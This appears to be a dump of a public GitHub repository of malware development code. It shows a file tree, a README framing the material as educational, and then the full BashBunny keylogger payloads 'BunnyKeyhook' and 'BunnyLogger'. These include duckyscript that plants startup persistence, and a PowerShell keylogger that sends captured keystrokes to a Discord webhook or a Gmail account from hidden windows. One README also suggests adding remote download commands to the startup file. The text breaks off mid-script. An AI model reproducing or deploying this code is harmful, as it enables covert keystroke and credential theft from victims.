├── .gitignore ├── README.md ├── bashbunny ├── BunnyKeyhook │ ├── LICENSE │ ├── README.md │ ├── c.cmd │ ├── duckyscript.txt │ ├── l.ps1 │ ├── p.ps1 │ ├── payload.txt │ └── uninstaller.cmd ├── BunnyLogger │ ├── LICENSE │ ├── README.md │ ├── c.cmd │ ├── duckyscript.txt │ ├── l.ps1 │ ├── p.ps1 │ └── payload.txt ├── OnlyBUGS │ ├── README.md │ ├── duckyscript.txt │ └── payload.txt ├── geofencing │ └── payload.txt ├── helloworld │ └── payload.txt ├── remote-trigger │ └── payload.txt ├── webcredential-gui │ ├── P.cfg │ ├── P.exe │ ├── README.md │ ├── WebBrowserPassView.chm │ ├── ducky-script.txt │ └── payload.txt └── wifi-credentials │ ├── README.md │ ├── ducky-script.txt │ └── payload.txt ├── discord ├── bot.nim ├── bot.py ├── exfiltration-screen.ps1 ├── exfiltration-wifi.ps1 ├── get-webhook.cmd ├── get-webhook.ps1 ├── get-webhook.sh ├── send-file.cmd ├── send-file.ps1 ├── send-file.sh ├── send-message.cmd ├── send-message.ps1 └── send-message.sh ├── privesc ├── create-admin.ps1 ├── getadmin.cmd └── uac-prompt.cmd ├── reports ├── README.md └── sillyputty │ ├── README.md │ ├── SillyPutty-MalwareAnalysisReport.pdf │ ├── putty.7z │ └── sillyputty.yara ├── rubberducky ├── DucKey-Logger │ ├── LICENSE │ ├── README.md │ ├── c.cmd │ ├── l.ps1 │ ├── p.ps1 │ └── payload.txt ├── DucKeyhook │ ├── LICENSE │ ├── README.md │ ├── c.cmd │ ├── l.ps1 │ ├── p.ps1 │ ├── payload.txt │ └── uninstaller.cmd ├── DuckMinistrator │ ├── LICENSE │ ├── README.md │ ├── c.cmd │ ├── inject.bin │ └── payload.txt ├── OnlyDuck │ ├── README.md │ └── onlyduck.txt ├── duckfi │ ├── README.md │ ├── c.cmd │ └── payload.txt ├── ducky-flasher │ ├── Firmware │ │ ├── USB_v2.hex │ │ ├── c_duck_v2.hex │ │ ├── c_duck_v2_S001.hex │ │ ├── c_duck_v2_S002.hex │ │ ├── duck_v2.hex │ │ └── m_duck_v2.hex │ ├── README.md │ ├── ducky-flasher │ ├── readme.txt │ ├── setup.py │ └── uninstall.py ├── duckylan-smtp │ ├── LICENSE │ ├── README.md │ ├── p.ps1 │ └── payload.txt ├── encoder │ ├── README.md │ ├── duckencoder.py │ └── 
resources │ │ ├── be.properties │ │ ├── br.properties │ │ ├── ca.properties │ │ ├── ch.properties │ │ ├── cm.properties │ │ ├── cs.properties │ │ ├── de.properties │ │ ├── dk.properties │ │ ├── es.properties │ │ ├── fi.properties │ │ ├── fr.properties │ │ ├── gb.properties │ │ ├── hr.properties │ │ ├── it.properties │ │ ├── keyboard.properties │ │ ├── no.properties │ │ ├── pt.properties │ │ ├── ru.properties │ │ ├── si.properties │ │ ├── sv.properties │ │ ├── tr.properties │ │ └── us.properties ├── helloworld │ ├── inject.bin │ └── payload.txt ├── twinduck-wifipass │ ├── inject.bin │ └── payload.txt └── webattack │ ├── inject.bin │ └── payload.txt ├── ssh ├── disable-ssh-persistence.ps1 ├── enable-ssh-persistence.ps1 └── remote-code-exec.sh ├── tcp ├── Makefile ├── agent ├── agent.c ├── c2.py └── poc.txt └── videos ├── alternative-data-streams ├── README.md ├── ads.png ├── grad.mp4 ├── main.c ├── main.exe └── payload.txt ├── developing-trojans-with-shellcode ├── README.md ├── ZoomIt.exe ├── calc.bin ├── main.c ├── main.exe └── zoomit.log ├── embedding-shellcode ├── README.md ├── embed-data │ ├── a.exe │ ├── embed-data.cpp │ ├── embed-data.exe │ ├── embed-data.ilk │ ├── embed-data.obj │ ├── embed-data.pdb │ └── vc140.pdb ├── embed-rsrc │ ├── embed-rsrc.cpp │ ├── embed-rsrc.exe │ ├── embed-rsrc.obj │ ├── notepad32.ico │ ├── rsrc.o │ ├── rsrc.rc │ └── rsrc.res ├── embed-text │ ├── embed-text.cpp │ ├── embed-text.exe │ ├── embed-text.ilk │ ├── embed-text.obj │ ├── embed-text.pdb │ └── vc140.pdb └── notepad32.c ├── fun-with-dlls ├── README.md ├── cosmo.dll ├── dll-loader.cpp ├── dll-loader.exe ├── dll-proxy.c ├── dll.c ├── proxy.dll ├── shell.dll └── shell.nim ├── function-obfuscation ├── fob │ ├── function-obfuscation-cgpa.cpp │ ├── function-obfuscation-cgpa.obj │ ├── function-obfuscation-full.cpp │ ├── function-obfuscation-full.obj │ ├── function-obfuscation-full2.cpp │ ├── function-obfuscation.cpp │ ├── function-obfuscation.exe │ ├── function-obfuscation.obj │ ├── 
notepad.bin │ ├── vc140.pdb │ └── xor-encrypt.py └── function-obfuscation.cpp ├── keystroke-injection-vbs ├── README.md ├── injection-backspace.vbs ├── injection-disco.vbs └── injection-string.vbs ├── malware-roadmap ├── README.md ├── css │ ├── layout.css │ ├── mattropolis.css │ └── vs2015.css ├── dist │ ├── fontawesome │ │ └── all.min.js │ ├── reset.css │ ├── reveal.css │ ├── reveal.esm.js │ ├── reveal.esm.js.map │ ├── reveal.js │ ├── reveal.js.map │ └── theme │ │ ├── beige.css │ │ ├── black.css │ │ ├── blood.css │ │ ├── consult.css │ │ ├── fonts │ │ ├── lato │ │ │ └── lato.css │ │ ├── league-gothic │ │ │ └── league-gothic.css │ │ └── source-sans-pro │ │ │ ├── LICENSE │ │ │ ├── source-sans-pro-italic.eot │ │ │ ├── source-sans-pro-italic.ttf │ │ │ ├── source-sans-pro-italic.woff │ │ │ ├── source-sans-pro-regular.eot │ │ │ ├── source-sans-pro-regular.ttf │ │ │ ├── source-sans-pro-regular.woff │ │ │ ├── source-sans-pro-semibold.eot │ │ │ ├── source-sans-pro-semibold.ttf │ │ │ ├── source-sans-pro-semibold.woff │ │ │ ├── source-sans-pro-semibolditalic.eot │ │ │ ├── source-sans-pro-semibolditalic.ttf │ │ │ ├── source-sans-pro-semibolditalic.woff │ │ │ └── source-sans-pro.css │ │ ├── league.css │ │ ├── mattropolis.css │ │ ├── moon.css │ │ ├── night.css │ │ ├── serif.css │ │ ├── simple.css │ │ ├── sky.css │ │ ├── solarized.css │ │ └── white.css ├── index.html ├── plugin │ ├── chalkboard │ │ ├── README.md │ │ ├── _style.css │ │ ├── img │ │ │ ├── blackboard.png │ │ │ ├── boardmarker-black.png │ │ │ ├── boardmarker-blue.png │ │ │ ├── boardmarker-green.png │ │ │ ├── boardmarker-orange.png │ │ │ ├── boardmarker-purple.png │ │ │ ├── boardmarker-red.png │ │ │ ├── boardmarker-yellow.png │ │ │ ├── chalk-blue.png │ │ │ ├── chalk-green.png │ │ │ ├── chalk-orange.png │ │ │ ├── chalk-purple.png │ │ │ ├── chalk-red.png │ │ │ ├── chalk-white.png │ │ │ ├── chalk-yellow.png │ │ │ ├── sponge.png │ │ │ └── whiteboard.png │ │ ├── plugin (copy).js │ │ ├── plugin.js │ │ └── style.css │ ├── 
chart │ │ ├── README.md │ │ ├── chart.min.js │ │ └── plugin.js │ ├── customcontrols │ │ ├── README.md │ │ ├── plugin.js │ │ └── style.css │ ├── elapsed-time-bar │ │ └── elapsed-time-bar.js │ ├── highlight │ │ ├── highlight.esm.js │ │ ├── highlight.js │ │ ├── monokai.css │ │ ├── plugin.js │ │ └── zenburn.css │ ├── markdown │ │ ├── markdown.esm.js │ │ ├── markdown.js │ │ └── plugin.js │ ├── math │ │ ├── katex.js │ │ ├── math.esm.js │ │ ├── math.js │ │ ├── mathjax │ │ │ ├── a11y │ │ │ │ ├── assistive-mml.js │ │ │ │ ├── complexity.js │ │ │ │ ├── explorer.js │ │ │ │ └── semantic-enrich.js │ │ │ ├── adaptors │ │ │ │ └── liteDOM.js │ │ │ ├── core.js │ │ │ ├── input │ │ │ │ ├── asciimath.js │ │ │ │ ├── mml.js │ │ │ │ ├── mml │ │ │ │ │ ├── entities.js │ │ │ │ │ └── extensions │ │ │ │ │ │ ├── mml3.js │ │ │ │ │ │ └── mml3.sef.json │ │ │ │ ├── tex-base.js │ │ │ │ ├── tex-full.js │ │ │ │ ├── tex.js │ │ │ │ └── tex │ │ │ │ │ └── extensions │ │ │ │ │ ├── action.js │ │ │ │ │ ├── all-packages.js │ │ │ │ │ ├── ams.js │ │ │ │ │ ├── amscd.js │ │ │ │ │ ├── autoload.js │ │ │ │ │ ├── bbox.js │ │ │ │ │ ├── boldsymbol.js │ │ │ │ │ ├── braket.js │ │ │ │ │ ├── bussproofs.js │ │ │ │ │ ├── cancel.js │ │ │ │ │ ├── centernot.js │ │ │ │ │ ├── color.js │ │ │ │ │ ├── colortbl.js │ │ │ │ │ ├── colorv2.js │ │ │ │ │ ├── configmacros.js │ │ │ │ │ ├── enclose.js │ │ │ │ │ ├── extpfeil.js │ │ │ │ │ ├── gensymb.js │ │ │ │ │ ├── html.js │ │ │ │ │ ├── mathtools.js │ │ │ │ │ ├── mhchem.js │ │ │ │ │ ├── newcommand.js │ │ │ │ │ ├── noerrors.js │ │ │ │ │ ├── noundefined.js │ │ │ │ │ ├── physics.js │ │ │ │ │ ├── require.js │ │ │ │ │ ├── setoptions.js │ │ │ │ │ ├── tagformat.js │ │ │ │ │ ├── textcomp.js │ │ │ │ │ ├── textmacros.js │ │ │ │ │ ├── unicode.js │ │ │ │ │ ├── upgreek.js │ │ │ │ │ └── verb.js │ │ │ ├── latest.js │ │ │ ├── loader.js │ │ │ ├── mml-chtml.js │ │ │ ├── mml-svg.js │ │ │ ├── node-main.js │ │ │ ├── output │ │ │ │ ├── chtml.js │ │ │ │ ├── chtml │ │ │ │ │ └── fonts │ │ │ │ │ │ ├── tex.js │ │ │ │ │ 
│ └── woff-v2 │ │ │ │ │ │ ├── MathJax_AMS-Regular.woff │ │ │ │ │ │ ├── MathJax_Calligraphic-Bold.woff │ │ │ │ │ │ ├── MathJax_Calligraphic-Regular.woff │ │ │ │ │ │ ├── MathJax_Fraktur-Bold.woff │ │ │ │ │ │ ├── MathJax_Fraktur-Regular.woff │ │ │ │ │ │ ├── MathJax_Main-Bold.woff │ │ │ │ │ │ ├── MathJax_Main-Italic.woff │ │ │ │ │ │ ├── MathJax_Main-Regular.woff │ │ │ │ │ │ ├── MathJax_Math-BoldItalic.woff │ │ │ │ │ │ ├── MathJax_Math-Italic.woff │ │ │ │ │ │ ├── MathJax_Math-Regular.woff │ │ │ │ │ │ ├── MathJax_SansSerif-Bold.woff │ │ │ │ │ │ ├── MathJax_SansSerif-Italic.woff │ │ │ │ │ │ ├── MathJax_SansSerif-Regular.woff │ │ │ │ │ │ ├── MathJax_Script-Regular.woff │ │ │ │ │ │ ├── MathJax_Size1-Regular.woff │ │ │ │ │ │ ├── MathJax_Size2-Regular.woff │ │ │ │ │ │ ├── MathJax_Size3-Regular.woff │ │ │ │ │ │ ├── MathJax_Size4-Regular.woff │ │ │ │ │ │ ├── MathJax_Typewriter-Regular.woff │ │ │ │ │ │ ├── MathJax_Vector-Bold.woff │ │ │ │ │ │ ├── MathJax_Vector-Regular.woff │ │ │ │ │ │ └── MathJax_Zero.woff │ │ │ │ ├── svg.js │ │ │ │ └── svg │ │ │ │ │ └── fonts │ │ │ │ │ └── tex.js │ │ │ ├── sre │ │ │ │ ├── mathmaps │ │ │ │ │ ├── de.js │ │ │ │ │ ├── en.js │ │ │ │ │ ├── es.js │ │ │ │ │ ├── fr.js │ │ │ │ │ ├── hi.js │ │ │ │ │ ├── it.js │ │ │ │ │ └── nemeth.js │ │ │ │ ├── sre-node.js │ │ │ │ └── sre_browser.js │ │ │ ├── startup.js │ │ │ ├── tex-chtml-full.js │ │ │ ├── tex-chtml.js │ │ │ ├── tex-mml-chtml.js │ │ │ ├── tex-mml-svg.js │ │ │ ├── tex-svg-full.js │ │ │ ├── tex-svg.js │ │ │ └── ui │ │ │ │ ├── lazy.js │ │ │ │ ├── menu.js │ │ │ │ └── safe.js │ │ ├── mathjax2.js │ │ ├── mathjax3.js │ │ └── plugin.js │ ├── menu │ │ ├── CONTRIBUTING.md │ │ ├── LICENSE │ │ ├── README.md │ │ ├── bower.json │ │ ├── gulpfile.js │ │ ├── menu.css │ │ ├── menu.esm.js │ │ ├── menu.js │ │ ├── package.json │ │ └── plugin.js │ ├── mermaid │ │ ├── mermaid.esm.js │ │ ├── mermaid.js │ │ └── plugin.js │ ├── notes │ │ ├── notes.esm.js │ │ ├── notes.js │ │ ├── plugin.js │ │ └── speaker-view.html │ ├── 
reveal-pointer │ │ ├── pointer.css │ │ └── pointer.js │ ├── search │ │ ├── plugin.js │ │ ├── search.esm.js │ │ └── search.js │ └── zoom │ │ ├── plugin.js │ │ ├── zoom.esm.js │ │ └── zoom.js └── slides.pdf ├── pe-deepdive ├── README.md ├── cosmo.dll ├── example-dll.c ├── example-exe.cpp └── example-exe.exe ├── port-knocking ├── README.md └── port-knocker.c ├── qemu-malware-lab ├── README.md └── personalize-windows.reg ├── tools-for-malware-analysis └── README.md ├── tools-for-malware-development ├── README.md └── ninite.exe └── wix-0-day ├── README.md └── wix.py /.gitignore: -------------------------------------------------------------------------------- 1 | dns 2 | http 3 | smtp 4 | socks 5 | <<<<<<< HEAD 6 | ssh 7 | tcp 8 | ======= 9 | >>>>>>> 63fbf5bf718b9e1e4932c91c05fb131c42385c11 10 | udp 11 | web-sockets 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Malware Development and Analysis [DNA] 2 | This repository holds different snippets of code that can be used for offensive development as well as malware development and analysis. 
be responsible, as this is for educational purposes and is to serve as a resource for offensive developers and fans of the channel :) 3 | 4 | ## Development: 5 | - [Malware Development Videos](https://www.youtube.com/playlist?list=PL_dk67mLCSFHa5jDNvEuXuoafMHmTjn32) 6 | - [Malware Research](https://cosmodiumcs.com/blog) 7 | 8 | ## Analysis: 9 | - [Malware Analysis Videos](https://www.youtube.com/playlist?list=PL_dk67mLCSFGSkl3IiKH9H34VoeQDThFf) 10 | - [Malware Analysis Reports](https://www.cosmodiumcs.com/library) 11 | 12 | happy hacking - CosmodiumCS Development Team 13 | 14 | -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License [MODIFIED] 2 | 3 | Copyright (c) 2020, Cosmodium CyberSecurity 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | 31 | The above copyright notice and this permission notice shall be included in all 32 | copies or substantial portions of the Software. -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/c.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | PowerShell.exe -ExecutionPolicy Bypass -windowstyle hidden -File "%TEMP%\p.ps1" 3 | PowerShell.exe -ExecutionPolicy Bypass -windowstyle hidden -File "%TEMP%\l.ps1" 4 | -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/duckyscript.txt: -------------------------------------------------------------------------------- 1 | REM Powershell Keylogger for the USB RubberDucky 2 | REM created by : C0SM0 3 | 4 | REM STAGE1 5 | REM open runbox 6 | DELAY 1000 7 | GUI r 8 | DELAY 200 9 | STRING powershell 10 | ENTER 11 | DELAY 300 12 | 13 | REM STAGE 2 14 | REM move files to appropriate directories 15 | REM change 'BashBunny' to the name of your bash bunny 16 | REM change 'switch1' to the switch position that stores the payload 17 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BashBunny'}|select name;cd $u.name;cp .\payloads\switch1\p.ps1 $env:temp;cp .\payloads\switch1\l.ps1 $env:temp;cp .\payloads\switch1\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; 18 | ENTER 
19 | DELAY 200 20 | 21 | REM STAGE 3 22 | REM run keylogger 23 | STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd;exit 24 | 25 | REM STAGE 4 26 | REM deploy 27 | ENTER 28 | -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/l.ps1: -------------------------------------------------------------------------------- 1 | # powershell log scheduler 2 | # created by : C0SM0 3 | for(;;) { 4 | try { 5 | $proc = Get-Content "$env:temp/DdBPKCytRe" 6 | Stop-process -id $proc -Force 7 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1" 8 | } 9 | catch { 10 | 11 | } 12 | 13 | # change number of seconds for different delays 14 | Start-Sleep 60 15 | } 16 | 17 | -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/p.ps1: -------------------------------------------------------------------------------- 1 | # powershell keylogger 2 | # created by : C0SM0 3 | 4 | # webhook, change "WEBHOOK" to your discord webhook 5 | $webhook = "WEBHOOK" 6 | 7 | # write pid 8 | $PID > "$env:temp/DdBPKCytRe" 9 | 10 | # keylogger 11 | function KeyLogger($logFile="$env:temp/$env:UserName.log") { 12 | 13 | # webhook process 14 | $logs = Get-Content "$logFile" | Out-String 15 | $Body = @{ 16 | 'username' = $env:UserName 17 | 'content' = $logs 18 | } 19 | Invoke-RestMethod -Uri $webhook -Method 'post' -Body $Body 20 | 21 | # generate log file 22 | $generateLog = New-Item -Path $logFile -ItemType File -Force 23 | 24 | # API signatures 25 | $APIsignatures = @' 26 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 27 | public static extern short GetAsyncKeyState(int virtualKeyCode); 28 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 29 | public static extern int GetKeyboardState(byte[] keystate); 30 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 31 | public static extern int MapVirtualKey(uint uCode, 
int uMapType); 32 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 33 | public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); 34 | '@ 35 | 36 | # set up API 37 | $API = Add-Type -MemberDefinition $APIsignatures -Name 'Win32' -Namespace API -PassThru 38 | 39 | # attempt to log keystrokes 40 | try { 41 | while ($true) { 42 | Start-Sleep -Milliseconds 40 43 | 44 | for ($ascii = 9; $ascii -le 254; $ascii++) { 45 | 46 | # use API to get key state 47 | $keystate = $API::GetAsyncKeyState($ascii) 48 | 49 | # use API to detect keystroke 50 | if ($keystate -eq -32767) { 51 | $null = [console]::CapsLock 52 | 53 | # map virtual key 54 | $mapKey = $API::MapVirtualKey($ascii, 3) 55 | 56 | # create a stringbuilder 57 | $keyboardState = New-Object Byte[] 256 58 | $hideKeyboardState = $API::GetKeyboardState($keyboardState) 59 | $loggedchar = New-Object -TypeName System.Text.StringBuilder 60 | 61 | # translate virtual key 62 | if ($API::ToUnicode($ascii, $mapKey, $keyboardState, $loggedchar, $loggedchar.Capacity, 0)) { 63 | # add logged key to file 64 | [System.IO.File]::AppendAllText($logFile, $loggedchar, [System.Text.Encoding]::Unicode) 65 | } 66 | } 67 | } 68 | } 69 | } 70 | 71 | # send logs if code fails 72 | finally { 73 | # send logs via webhook 74 | Invoke-RestMethod -Uri $webhook -Method 'post' -Body $Body 75 | } 76 | } 77 | 78 | # run keylogger 79 | KeyLogger -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/payload.txt: -------------------------------------------------------------------------------- 1 | # Title: BunnyKeyhook 2 | # Description: Powershell Keylogger w/ Discord 3 | # Author: Blue Cosmo 4 | # Category: exfiltration 5 | # Target: Windows 10 6 | # Attackmodes: HID, STORAGE 7 | 8 | # setup payload 9 | LED SETUP 10 | ATTACKMODE HID STORAGE 11 | GET SWITCH_POSITION 12 | 13 | # execute duckyscript 14 | LED STAGE1 15 | 
QUACK ${SWITCH_POSITION}/duckyscript.txt 16 | 17 | LED FINISH -------------------------------------------------------------------------------- /bashbunny/BunnyKeyhook/uninstaller.cmd: -------------------------------------------------------------------------------- 1 | cd C:/Users/%USERNAME%/AppData/Roaming/Microsoft/Windows && cd "Start Menu" && cd Programs/Startup 2 | del c.cmd 3 | cd %TEMP% 4 | del l.ps1 5 | del p.ps1 6 | del DdBPKCytRe 7 | del %USERNAME%.log 8 | taskkill /im powershell.exe /f 9 | -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License [MODIFIED] 2 | 3 | Copyright (c) 2020, Cosmodium CyberSecurity 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | 31 | The above copyright notice and this permission notice shall be included in all 32 | copies or substantial portions of the Software. -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/README.md: -------------------------------------------------------------------------------- 1 | # Bunny Logger 2 | > Chris Taylor [Blue Cosmo] | 08/24/21 3 | --- 4 | 5 | ``` 6 | __________ .____ 7 | \______ \__ __ ____ ____ ___.__.| | ____ ____ ____ ___________ 8 | | | _/ | \/ \ / < | || | / _ \ / ___\ / ___\_/ __ \_ __ \ 9 | | | \ | / | \ | \___ || |__( <_> ) /_/ > /_/ > ___/| | \/ 10 | |______ /____/|___| /___| / ____||_______ \____/\___ /\___ / \___ >__| 11 | \/ \/ \/\/ \/ /_____//_____/ \/ 12 | ``` 13 | 14 | ## Overview: 15 | ``` 16 | BunnyLogger is a BashBunny payload that uses PowerShell to log keystrokes 17 | ``` 18 | - moves *c.cmd* file to windows startup directory 19 | - *c.cmd* will secretly run *p.ps1* 20 | - *p.ps1* will log keystrokes 21 | - *l.ps1* will email the logs every startup and every hour [via SMTP] 22 | - sends logs hourly, regardless of system time 23 | 24 | ## Resources: 25 | - [YouTube Video](https://www.youtube.com/watch?v=z8KD9zU50xc) 26 | - [YouTube Channel](https://youtube.com/cosmodiumcs) 27 | - [Website](https://cosmodiumcs.com) 28 | 29 | ## Requirements: 30 | - Gmail account 31 | - i suggest making a separate Gmail account for this payload 32 | - your 
Gmail must have [LSA Access](https://myaccount.google.com/lesssecureapps?pli=1&rapt=AEjHL4Px2VEFPoFPEuLutMD6UhNVRyY9P3s7l-pCGA53NBqilKVrtltrfS1823x5i6k6_pSEVp6jkEW0zKQT2CHN0WXh4fvGiw) enabled 33 | - Windows 10 Target 34 | 35 | ## Download: 36 | ```bash 37 | svn checkout https://github.com/CosmodiumCS/MalwareDNA/trunk/bashbunny/BunnyLogger 38 | ``` 39 | 40 | ## Instructions: 41 | Set-Up/Installation 42 | 1. change Gmail credentials in *p.ps1* 43 | ```powershell 44 | # gmail credentials 45 | $email = "example@gmail.com" 46 | $password = "password" 47 | ``` 48 | 2. in line 7 of *duckyscript.txt*, change 'switch1' to whatever switch you use 49 | 3. in line 7 of *duckyscript.txt*, change 'BashBunny' to the name of your BashBunny 50 | ```powershell 51 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BashBunny'}|select name;cd $u.name;cp .\payloads\switch1\p.ps1 $env:temp;cp .\payloads\switch1\l.ps1 $env:temp;cp .\payloads\switch1\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; 52 | ``` 53 | ## Extraneous: 54 | The *c.cmd* attack opportunity 55 | ``` 56 | the c.cmd file runs every startup. 57 | this means an attacker could place a 58 | 'wget' or 'Invoke-WebRequest' and have a file 59 | be downloaded from anywhere on the internet onto the computer. 60 | the file would then save in the startup directory, 61 | allowing it to run every startup 62 | ``` 63 | --- 64 | - hope you enjoy the payload!! 
65 | - please subscribe to my [YouTube channel](https://youtube.com/cosmodiumcs) :) 66 | -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/c.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1" 3 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/l.ps1" 4 | -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/duckyscript.txt: -------------------------------------------------------------------------------- 1 | REM STAGE3 2 | REM allow time for powershell to open 3 | DELAY 300 4 | 5 | REM STAGE4 6 | REM cd into the BashBunny, labeled 'BashBunny', and move files to the appropriate directories 7 | STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BashBunny'}|select name;cd $u.name;cp .\payloads\switch1\p.ps1 $env:temp;cp .\payloads\switch1\l.ps1 $env:temp;cp .\payloads\switch1\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; 8 | ENTER 9 | DELAY 200 10 | 11 | REM STAGE5 12 | REM run keylogger 13 | STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd;exit 14 | ENTER 15 | -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/l.ps1: -------------------------------------------------------------------------------- 1 | # powershell log scheduler 2 | # created by : C0SM0 3 | 4 | # times logs will be sent [keep in military time] 5 | $logTimes = @( 6 | '00:00:00', 7 | '01:00:00', 8 | '02:00:00', 9 | '03:00:00', 10 | '04:00:00', 11 | '05:00:00', 12 | '06:00:00', 13 | '07:00:00', 14 | '08:00:00', 15 | '09:00:00', 16 | '10:00:00', 17 | '11:00:00', 18 | '12:00:00', 19 | '13:00:00', 20 | '14:00:00', 21 | '15:00:00', 22 | '16:00:00', 23 | '17:00:00', 24 | 
'18:00:00', 25 | '19:00:00', 26 | '20:00:00', 27 | '21:00:00', 28 | '22:00:00', 29 | '23:00:00' 30 | ) 31 | 32 | # sort the times in chronological order 33 | $logTimes = $logTimes | Sort-Object 34 | 35 | # ensure keylogger runs every day 36 | while ($true) { 37 | 38 | # run keylogger for each trigger time 39 | foreach ($t in $logTimes) 40 | { 41 | # checks if time passed already 42 | if((Get-Date) -lt (Get-Date -Date $t)) 43 | { 44 | # sleeps until next time is reached 45 | while ((Get-Date -Date $t) -gt (Get-Date)) 46 | { 47 | # sleeps 48 | (Get-Date -Date $t) - (Get-Date) | Start-Sleep 49 | } 50 | 51 | # runs keylogger 52 | powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1" 53 | } 54 | } 55 | } -------------------------------------------------------------------------------- /bashbunny/BunnyLogger/p.ps1: -------------------------------------------------------------------------------- 1 | # powershell keylogger 2 | # created by : C0SM0 3 | 4 | # gmail credentials 5 | $email = "example@gmail.com" 6 | $password = "password" 7 | 8 | # keylogger 9 | function KeyLogger($logFile="$env:temp/$env:UserName.log") { 10 | 11 | # email process 12 | $logs = Get-Content "$logFile" 13 | $subject = "$env:UserName logs" 14 | $smtp = New-Object System.Net.Mail.SmtpClient("smtp.gmail.com", "587"); 15 | $smtp.EnableSSL = $true 16 | $smtp.Credentials = New-Object System.Net.NetworkCredential($email, $password); 17 | $smtp.Send($email, $email, $subject, $logs); 18 | 19 | # generate log file 20 | $generateLog = New-Item -Path $logFile -ItemType File -Force 21 